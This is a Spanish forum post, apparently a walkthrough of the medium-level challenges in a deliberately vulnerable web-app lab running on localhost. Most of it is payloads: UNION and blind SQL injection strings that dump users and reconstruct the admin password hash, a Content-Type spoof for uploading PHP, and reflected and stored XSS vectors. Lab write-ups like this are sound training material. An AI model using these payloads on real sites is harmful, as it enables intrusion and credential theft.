Hola Foro El otro dia me baje esta herramienta de testeo de vulnerabilidades Tipo Web
y bueno le he dado caña y quería postear aqui las soluciones. si quieren probar les recomiendo
que lo intenten vosotros, las de nivel easy no las pongo por que mmm no tiene ninguna dificultad

Brute Force:
//Mi version del Firefox no es compatible con este addon pero bueno ya ven como se bypassea aqui un video
[Enlace externo eliminado para invitados]

CSRF
level medium

Mostrar/Ocultar


File Include
level medium

Código: Seleccionar todo

hTTp://127.0.0.1/index.php
-------------------------------------------------
SQL Injection:
level easy

Código: Seleccionar todo

1' order by 2-- a
1' union select 1,2-- a
1' union select user(),2-- a
1' union select database(),2-- a
1' union select version(),2-- a
1' union select table_name,2 from mysql.tables-- a
1' union select column_name,2 from information_schema.columns where table_name='users'-- a
1' union select concat(User,0x3a,password),2 from users-- a
level medium

Código: Seleccionar todo

-1/**/union/**/select/**/1,2-- a
-1/**/union/**/select/**/user(),2-- a
-1/**/union/**/select/**/concat(user(),0x3a,database(),0x3a,version()),2-- a
-1/**/union/**/select/**/table_name,2/**/from/**/information_schema.tables-- a
-1/**/union/**/select/**/column_name,2/**/from/**/information_schema.columns/**/where/**/table_name=char(117,115,101,114,115)-- a
-1/**/union/**/select/**/concat(user,0x3a,password),2/**/from/**/users-- a
----------------------------------------------


SQL Injection (Blind)
level medium

Código: Seleccionar todo

1 or user()=user() and version()=version()
1 || (SELECT Count(*) FROM users)=5
1 || (SELECT Count(user) FROM users)=5
1 || (SELECT LENGTH(password) FROM users WHERE user=char(97,100,109,105,110))=32
1 || (SELECT SUBSTRING((password),1,1) FROM users WHERE user=char(97,100,109,105,110))=5
/* 5 por lo que es integer y no da problema a diferencia con abajo */
1 || (SELECT SUBSTRING((password),1,2) FROM users WHERE user=char(97,100,109,105,110))=char(53,102)
/* Ahora luego como lo siguiente es f quedando asi 5f ya sería integer+varchar y como varchar comprende letas y numeros pues :D */
1 || (SELECT SUBSTRING((password),1,32) FROM users WHERE user=char(97,100,109,105,110))=char(53,102,52,100,99,99,51,98,53,97,97,55,54,53,100,54,49,100,56,51,50,55,100,101,98,56,56,50,99,102,57,57)
/* la pass de admin es 5f4dcc3b5aa765d61d8327deb882cf99 */

Uploader:
level medium

Código: Seleccionar todo

//cambiar el Content-Type del php por el de la imagen desde un interceptar/modificar de lo enviado por POST
Content-Type: image/jpeg\r\n\r\n

XSS reflected:
level medium

Código: Seleccionar todo

<body onload=alert(8)>

XSS stored:
level medium

Código: Seleccionar todo

Name * <input value='
Message * ' onmouseover=alert(8) >
Descarga:[Enlace externo eliminado para invitados]

Código: Seleccionar todo

<?php echo 'Saludos espero que lo disfruten'; ?>
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Responder

Volver a “Auditoria Web”